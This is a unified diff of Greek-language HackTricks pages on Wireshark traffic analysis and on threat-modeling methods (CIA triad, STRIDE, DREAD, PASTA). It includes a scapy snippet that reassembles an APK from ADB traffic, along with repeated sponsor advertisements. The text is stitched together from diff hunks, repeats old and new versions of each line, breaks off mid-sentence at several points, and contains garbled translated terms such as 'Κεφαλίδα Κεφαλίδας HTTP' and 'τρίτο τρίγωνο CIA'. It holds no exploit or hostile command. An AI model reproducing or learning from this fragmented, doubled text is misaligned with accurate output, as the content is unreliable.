<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο χάκινγκ υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## Βελτιώστε τις δεξιότητες σας στο Wireshark
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βελτιώστε τις δεξιότητές σας στο Wireshark
|
||||
|
||||
### Οδηγοί
|
||||
|
||||
Οι παρακάτω οδηγοί είναι εκπληκτικοί για να μάθετε μερικά ψυχαγωγικά βασικά κόλπα:
|
||||
Οι ακόλουθοι οδηγοί είναι εκπληκτικοί για να μάθετε μερικά ψυχαγωγικά βασικά κόλπα:
|
||||
|
||||
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
|
||||
|
||||
### Αναλυμένες πληροφορίες
|
||||
### Αναλυμένες Πληροφορίες
|
||||
|
||||
**Ειδικές πληροφορίες**
|
||||
**Ειδικές Πληροφορίες**
|
||||
|
||||
Κάνοντας κλικ στο _**Ανάλυση** --> **Ειδικές πληροφορίες**_ θα έχετε μια **επισκόπηση** του τι συμβαίνει στα αναλυμένα πακέτα:
|
||||
Κάνοντας κλικ σε _**Ανάλυση** --> **Ειδικές Πληροφορίες**_ θα έχετε μια **επισκόπηση** του τι συμβαίνει στα **αναλυμένα** πακέτα:
|
||||
|
||||
![](<../../../.gitbook/assets/image (570).png>)
|
||||
![](<../../../.gitbook/assets/image (253).png>)
|
||||
|
||||
**Επιλυμένες διευθύνσεις**
|
||||
**Επιλυμένες Διευθύνσεις**
|
||||
|
||||
Στο _**Στατιστικά --> Επιλυμένες διευθύνσεις**_ μπορείτε να βρείτε πολλές πληροφορίες που έχουν "**επιλυθεί**" από το wireshark, όπως θύρα/μεταφορά σε πρωτόκολλο, MAC στον κατασκευαστή, κλπ. Είναι ενδιαφέρον να γνωρίζετε τι εμπλέκεται στην επικοινωνία.
|
||||
Κάτω από _**Στατιστικά --> Επιλυμένες Διευθύνσεις**_ μπορείτε να βρείτε πολλές **πληροφορίες** που έχουν "**επιλυθεί**" από το wireshark όπως θύρα/μεταφορά σε πρωτόκολλο, MAC στον κατασκευαστή, κλπ. Είναι ενδιαφέρον να γνωρίζετε τι εμπλέκεται στην επικοινωνία.
|
||||
|
||||
![](<../../../.gitbook/assets/image (571).png>)
|
||||
![](<../../../.gitbook/assets/image (890).png>)
|
||||
|
||||
**Ιεραρχία πρωτοκόλλων**
|
||||
**Ιεραρχία Πρωτοκόλλου**
|
||||
|
||||
Στο _**Στατιστικά --> Ιεραρχία πρωτοκόλλων**_ μπορείτε να βρείτε τα **πρωτόκολλα** που εμπλέκονται στην επικοινωνία και πληροφορίες για αυτά.
|
||||
Κάτω από _**Στατιστικά --> Ιεραρχία Πρωτοκόλλου**_ μπορείτε να βρείτε τα **πρωτόκολλα** που **εμπλέκονται** στην επικοινωνία και δεδομένα σχετικά με αυτά.
|
||||
|
||||
![](<../../../.gitbook/assets/image (572).png>)
|
||||
![](<../../../.gitbook/assets/image (583).png>)
|
||||
|
||||
**Συνομιλίες**
|
||||
|
||||
Στο _**Στατιστικά --> Συνομιλίες**_ μπορείτε να βρείτε ένα **σύνολο πληροφοριών για τις συνομιλίες** στην επικοινωνία και πληροφορίες για αυτές.
|
||||
Κάτω από _**Στατιστικά --> Συνομιλίες**_ μπορείτε να βρείτε ένα **σύνολο των συνομιλιών** στην επικοινωνία και δεδομένα σχετικά με αυτές.
|
||||
|
||||
![](<../../../.gitbook/assets/image (573).png>)
|
||||
![](<../../../.gitbook/assets/image (450).png>)
|
||||
|
||||
**Σημεία άφιξης**
|
||||
**Ακραίες Σημεία**
|
||||
|
||||
Στο _**Στατιστικά --> Σημεία άφιξης**_ μπορείτε να βρείτε ένα **σύνολο πληροφοριών για τα σημεία άφιξης** στην επικοινωνία και πληροφορίες για καθένα από αυτά.
|
||||
Κάτω από _**Στατιστικά --> Ακραία Σημεία**_ μπορείτε να βρείτε ένα **σύνολο των ακραίων σημείων** στην επικοινωνία και δεδομένα για καθένα από αυτά.
|
||||
|
||||
![](<../../../.gitbook/assets/image (575).png>)
|
||||
![](<../../../.gitbook/assets/image (893).png>)
|
||||
|
||||
**Πληροφορίες DNS**
|
||||
|
||||
Στο _**Στατιστικά --> DNS**_ μπορείτε να βρείτε στατιστικά σχετικά με τα καταγεγραμμένα αιτήματα DNS.
|
||||
Κάτω από _**Στατιστικά --> DNS**_ μπορείτε να βρείτε στατιστικά σχετικά με τα καταγεγραμμένα αιτήματα DNS.
|
||||
|
||||
![](<../../../.gitbook/assets/image (577).png>)
|
||||
![](<../../../.gitbook/assets/image (1060).png>)
|
||||
|
||||
**Διάγραμμα I/O**
|
||||
**Γράφημα I/O**
|
||||
|
||||
Στο _**Στατιστικά --> Διάγραμμα I/O**_ μπορείτε να βρείτε ένα **διάγραμμα της επικοινωνίας**.
|
||||
Κάτω από _**Στατιστικά --> Γράφημα I/O**_ μπορείτε να βρείτε ένα **γράφημα της επικοινωνίας.**
|
||||
|
||||
![](<../../../.gitbook/assets/image (574).png>)
|
||||
![](<../../../.gitbook/assets/image (989).png>)
|
||||
|
||||
### Φίλτρα
|
||||
|
||||
|
@ -80,7 +92,57 @@
|
|||
* Κίνηση HTTP και αρχική κίνηση HTTPS
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
|
||||
* Κίνηση HTTP και αρχική κίνηση HTTPS + TCP SYN
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
|
||||
* Κίνηση HTTP και αρχική κίνηση HTTPS + TCP SYN + αιτήσεις DNS
|
||||
|
||||
### Αναζήτηση
|
||||
|
||||
Αν θέλετε να **αναζητήσετε** **περιεχόμενο** μέσα στα **πακέτα** των συνεδριών πατήστε _CTRL+f_. Μπορείτε να προσθέσετε νέα επίπεδα στην κύρια γραμμή πληροφοριών (Αρ., Χρόνος, Πηγή, κλπ.) πατώντας το δεξί κουμπί και στη συνέχεια την επεξεργασία στήλης.
|
||||
|
||||
### Δωρεάν εργαστήρια pcap
|
||||
|
||||
**Εξάσκηση με τις δωρεάν προκλήσεις του:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
|
||||
|
||||
## Αναγνώριση Domain
|
||||
|
||||
Μπορείτε να προσθέσετε μια στήλη που εμφανίζει τον Κεφαλίδα Κεφαλίδας HTTP:
|
||||
|
||||
![](<../../../.gitbook/assets/image (635).png>)
|
||||
|
||||
Και μια στήλη που προσθέτει το όνομα Διακομιστή από μια αρχική σύνδεση HTTPS (**ssl.handshake.type == 1**):
|
||||
|
||||
![](<../../../.gitbook/assets/image (408) (1).png>)
|
||||
|
||||
## Αναγνώριση τοπικών ονομάτων υπολογιστή
|
||||
|
||||
### Από DHCP
|
||||
|
||||
Στο τρέχον Wireshark αντί για `bootp` πρέπει να αναζητήσετε το `DHCP`
|
||||
|
||||
![](<../../../.gitbook/assets/image (1010).png>)
|
||||
|
||||
### Από NBNS
|
||||
|
||||
![](<../../../.gitbook/assets/image (1000).png>)
|
||||
|
||||
## Αποκρυπτογράφηση TLS
|
||||
|
||||
### Αποκρυπτογράφηση κίνησης https με ιδιωτικό κλειδί διακομιστή
|
||||
|
||||
_επεξεργασία>προτίμηση>πρωτόκολλο>ssl>_
|
||||
|
||||
![](<../../../.gitbook/assets/image (1100).png>)
|
||||
|
||||
Πατήστε _Επεξεργασία_ και προσθέστε όλα τα δεδομένα του διακομιστή και το ιδιωτικό κλειδί (_IP, Θύρα, Πρωτόκολλο, Αρχείο κλειδιού και κωδικό πρόσβασης_)
|
||||
|
||||
### Αποκρυπτογράφηση κίνησης https με συμμετρικά κλειδιά συνεδρίας
|
||||
|
||||
Τόσο ο Firefox όσο και ο Chrome έχουν τη δυνατότητα να καταγράφουν τα κλειδιά συνεδρίας TLS, τα οποία μπορούν να χρησιμοποιηθούν με το Wireshark για την αποκρυπτογράφηση της κίνησης TLS. Αυτό επιτρέπει την ανάλυση των ασφαλών επικοινωνιών. Περισσότερες λεπτομέρειες για το πώς να εκτελέσετε αυτήν την αποκρυπτογράφηση μπορείτε να βρείτε σε οδηγό στο [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
|
||||
|
||||
Για να ανιχνεύσετε αυτό αναζητήστε μέ
|
||||
## ADB επικοινωνία
|
||||
|
||||
Εξαγωγή ενός APK από μια ADB επικοινωνία όπου το APK στάλθηκε:
|
||||
```python
|
||||
from scapy.all import *
|
||||
|
||||
|
@ -107,16 +169,29 @@ f = open('all_bytes.data', 'w+b')
|
|||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
# Μοντέλο Απειλής
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των ληστειών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -20,37 +20,37 @@
|
|||
|
||||
### Συνηθισμένα Χρησιμοποιούμενα Σενάρια
|
||||
|
||||
1. **Ανάπτυξη Λογισμικού**: Ως μέρος του Ασφαλούς Κύκλου Ζωής Ανάπτυξης Λογισμικού (SSDLC), το μοντέλο απειλής βοηθάει στο **αναγνωρισμό πιθανών πηγών ευπαθειών** στα αρχικά στάδια ανάπτυξης.
|
||||
1. **Ανάπτυξη Λογισμικού**: Ως μέρος του Ασφαλούς Κύκλου Ζωής Ανάπτυξης Λογισμικού (SSDLC), το μοντέλο απειλής βοηθά στο **αναγνωρισμό πιθανών πηγών ευπαθειών** στα αρχικά στάδια ανάπτυξης.
|
||||
2. **Δοκιμές Διείσδυσης**: Το πλαίσιο Εκτέλεσης Δοκιμών Διείσδυσης (PTES) απαιτεί το **μοντέλο απειλής για την κατανόηση των ευπαθειών του συστήματος** πριν προχωρήσει στη δοκιμή.
|
||||
|
||||
### Μοντέλο Απειλής σε Γενικές Γραμμές
|
||||
|
||||
Ένα Μοντέλο Απειλής αναπαρίσταται συνήθως ως διάγραμμα, εικόνα ή κάποια άλλη μορφή οπτικής απεικόνισης που απεικονίζει την προγραμματισμένη αρχιτεκτονική ή την υπάρχουσα κατασκευή μιας εφαρμογής. Μοιάζει με ένα **διάγραμμα ροής δεδομένων**, αλλά η κύρια διαφορά βρίσκεται στον σχεδιασμό που εστιάζει στην ασφάλεια.
|
||||
|
||||
Τα μοντέλα απειλής συχνά περιλαμβάνουν στοιχεία που είναι σημειωμένα με κόκκινο, συμβολίζοντας πιθανές ευπάθειες, κινδύνους ή φραγματικά μέτρα. Για να διευκολυνθεί η διαδικασία αναγνώρισης κινδύνων, χρησιμοποιείται η τριάδα CIA (Εμπιστευτικότητα, Ακεραιότητα, Διαθεσιμότητα), η οποία αποτελεί τη βάση πολλών μεθοδολογιών μοντελοποίησης απειλών, με το STRIDE να είναι μία από τις πιο κοινές. Ωστόσο, η επιλεγμένη μεθοδολογία μπορεί να ποικίλλει ανάλογα με το συγκεκριμένο πλαίσιο και τις απαιτήσεις.
|
||||
Τα μοντέλα απειλής συχνά περιλαμβάνουν στοιχεία που είναι σημειωμένα με κόκκινο, συμβολίζοντας πιθανές ευπάθειες, κινδύνους ή φραγματικά. Για να διευκολυνθεί η διαδικασία αναγνώρισης κινδύνων, χρησιμοποιείται το τρίτο τρίγωνο CIA (Εμπιστευτικότητα, Ακεραιότητα, Διαθεσιμότητα), το οποίο αποτελεί τη βάση πολλών μεθοδολογιών μοντελοποίησης απειλών, με το STRIDE να είναι μία από τις πιο κοινές. Ωστόσο, η επιλεγμένη μεθοδολογία μπορεί να ποικίλλει ανάλογα με το συγκεκριμένο πλαίσιο και τις απαιτήσεις.
|
||||
|
||||
### Η Τριάδα CIA
|
||||
### Το Τρίγωνο CIA
|
||||
|
||||
Η Τριάδα CIA είναι ένα ευρέως αναγνωρισμένο μοντέλο στον τομέα της πληροφοριακής ασφάλειας, στέκοντας για Εμπιστευτικότητα, Ακεραιότητα και Διαθεσιμότητα. Αυτοί οι τρεις πυλώνες αποτελούν τη βάση στην οποία βασίζονται πολλά μέτρα ασφαλείας και πολιτικές, συμπεριλαμβανομένων των μεθοδολογιών μοντελοποίησης απειλών.
|
||||
Το Τρίγωνο CIA είναι ένα ευρέως αναγνωρισμένο μοντέλο στον τομέα της πληροφοριακής ασφάλειας, στέκεται για Εμπιστευτικότητα, Ακεραιότητα και Διαθεσιμότητα. Αυτές οι τρεις στήλες αποτελούν τη βάση στην οποία βασίζονται πολλά μέτρα ασφαλείας και πολιτικές, συμπεριλαμβανομένων των μεθοδολογιών μοντελοποίησης απειλών.
|
||||
|
||||
1. **Εμπιστευτικότητα**: Βεβαιωθείτε ότι τα δεδομένα ή το σύστημα δεν προσπελάζονται από μη εξουσιοδοτημένα άτομα. Αυτό είναι ένα κεντρικό στοιχείο της ασφάλειας, απαιτώντας κατάλληλους ελέγχους πρόσβασης, κρυπτογράφηση και άλλα μέτρα για να αποτρέψετε τις διαρροές δεδομένων.
|
||||
1. **Εμπιστευτικότητα**: Βεβαιωθείτε ότι τα δεδομένα ή το σύστημα δεν προσπελαστεί από μη εξουσιοδοτημένα άτομα. Αυτό είναι ένα κεντρικό στοιχείο της ασφάλειας, απαιτώντας κατάλληλους ελέγχους πρόσβασης, κρυπτογράφηση και άλλα μέτρα για να αποτρέψετε τις διαρροές δεδομένων.
|
||||
2. **Ακεραιότητα**: Η ακρίβεια, η συνέπεια και η αξιοπιστία των δεδομένων κατά τη διάρκεια του κύκλου ζωής τους. Αυτή η αρχή εξασφαλίζει ότι τα δεδομένα δεν τροποποιούνται ή δεν παραβιάζονται από μη εξουσιοδοτημένα μέρη. Συχνά περιλαμβάνει checksums, hashing και άλλες μεθόδους επαλήθευσης δεδομένων.
|
||||
3. **Διαθεσιμότητα**: Αυτό εξασφαλίζει ότι τα δεδομένα και οι υπηρεσίες είναι προσβάσιμα στους εξουσιοδοτημένους χρήστες όταν χρειάζονται. Συχνά περιλαμβάνει αντιγραφικότητα, ανοχή σφαλμάτων και ρυθμίσεις υψηλής διαθεσιμότητας για να διατηρούνται τα συστήματα λειτουργικά ακόμη και αν υπάρξουν διακοπές.
|
||||
3. **Διαθεσιμότητα**: Αυτό εξασφαλίζει ότι τα δεδομένα και οι υπηρεσίες είναι προσβάσιμα σε εξουσιοδοτημένους χρήστες όταν χρειάζονται. Συχνά περιλαμβάνει αντιγραφικότητα, ανοχή σφαλμάτων και ρυθμίσεις υψηλής διαθεσιμότητας για να διατηρούνται τα συστήματα λειτουργικά ακόμη και αν υπάρξουν διακοπές.
|
||||
|
||||
### Μεθοδολογίες Μοντελοποίησης Απειλών
|
||||
|
||||
1. **STRIDE**: Αναπτύχθηκε από τη Microsoft, το STRIDE είναι μια ακρώνυμη για **Παραποίηση, Παραβίαση, Αρνητική Αναγνώριση, Διαρροή Πληροφοριών, Αρνηση Υπηρεσίας και Ανύψωση Προνομίων**. Κάθε κατηγορία αντιπροσωπεύει έναν τύπο απειλής, και αυτή η μεθοδολογία χρησιμοποιείται συχνά στη φάση σχεδιασμού ενός προγράμματος ή συστήματος για την αναγνώριση πιθανών απειλών.
|
||||
2. **DREAD**: Αυτή είναι μια άλλη μεθοδολογία από τη Microsoft που χρησιμοποιείται για την αξιολόγηση κινδύνου των εντοπισμένων απειλών. Το DREAD σημαίνει **Δυναμικό Ζημίας, Επαναληψιμότητα, Εκμεταλλευσιμότητα, Επηρεαζόμενοι Χρήστες και Ανακαλύψιμοτητα**. Κάθε ένας από αυτούς τους παράγοντες βαθμολογείται, και το αποτέλεσμα χρησιμοποιείται για την προτεραιοποίηση των εντοπισμένων απειλών.
|
||||
3. **PASTA** (Διαδικασία για Προσομοίωση Επίθεσης και Ανάλυση Απειλών): Αυτή είναι μια μεθοδολογία επτά βημάτων, **εστιάζοντας στον κίνδυνο**. Περιλαμβάνει τον καθορισμό και την αναγνώριση των ασφαλειακών στόχων, τη δημιουργία ενός τεχνικού πεδίου, την ανάλυση απειλών, την ανάλυση ευπαθειών και την αξιολόγηση κινδύνων/τριαγκούλας.
|
||||
4. **Trike**: Αυτή είναι μια μεθοδολογία βασισμένη στον κίνδυνο που εστ
|
||||
1. **STRIDE**: Αναπτύχθηκε από τη Microsoft, το STRIDE είναι μια ακρώνυμη για **Παραποίηση, Παραβίαση, Αρνητική Αποδοχή, Αποκάλυψη Πληροφοριών, Αρνηση Υπηρεσίας και Ανύψωση Προνομίων**. Κάθε κατηγορία αντιπροσωπεύει έναν τύπο απειλής, και αυτή η μεθοδολογία χρησιμοποιείται συχνά στη φάση σχεδιασμού ενός προγράμματος ή συστήματος για την αναγνώριση πιθανών απειλών.
|
||||
2. **DREAD**: Αυτή είναι μια άλλη μεθοδολογία από τη Microsoft που χρησιμοποιείται για την αξιολόγηση κινδύνων των εντοπισμένων απειλών. Το DREAD σημαίνει **Δυναμικό Ζημίας, Επαναληψιμότητα, Εκμεταλλευσιμότητα, Επηρεασμένοι Χρήστες και Ανακαλύψιμοτητα**. Κάθε από αυτά τα στοιχεία βαθμολογείται, και το αποτέλεσμα χρησιμοποιείται για την προτεραιοποίηση των εντοπισμένων απειλών.
|
||||
3. **PASTA** (Διαδικασία για Προσομοίωση Επίθεσης και Ανάλυση Απειλών): Αυτή είναι μια μεθοδολογία επτά βημάτων, με κεντρική την ανάλυση κινδύνων. Περιλαμβάνει τον καθορισμό και την αναγνώριση των ασφαλειακών στόχων, τη δημιουργία ενός τεχνικού πεδίου, την ανάλυση απειλών, την ανάλυση ευπαθειών και την αξιολόγηση κινδύνων/τριαγκάρισμα.
|
||||
4. **Trike**: Αυτή είναι μια μεθοδολογία βασισμένη στους κινδύνους που επικεντ
|
||||
### [Εργαλείο Threat Modeling της Microsoft](https://aka.ms/threatmodelingtool)
|
||||
|
||||
Αυτό είναι ένα δωρεάν εργαλείο από τη Microsoft που βοηθά στον εντοπισμό απειλών στη φάση σχεδιασμού των έργων λογισμικού. Χρησιμοποιεί τη μεθοδολογία STRIDE και είναι ιδιαίτερα κατάλληλο για εκείνους που αναπτύσσουν στο σωρό της Microsoft.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
|
|
|
@ -8,17 +8,17 @@
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας κινητήρας αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
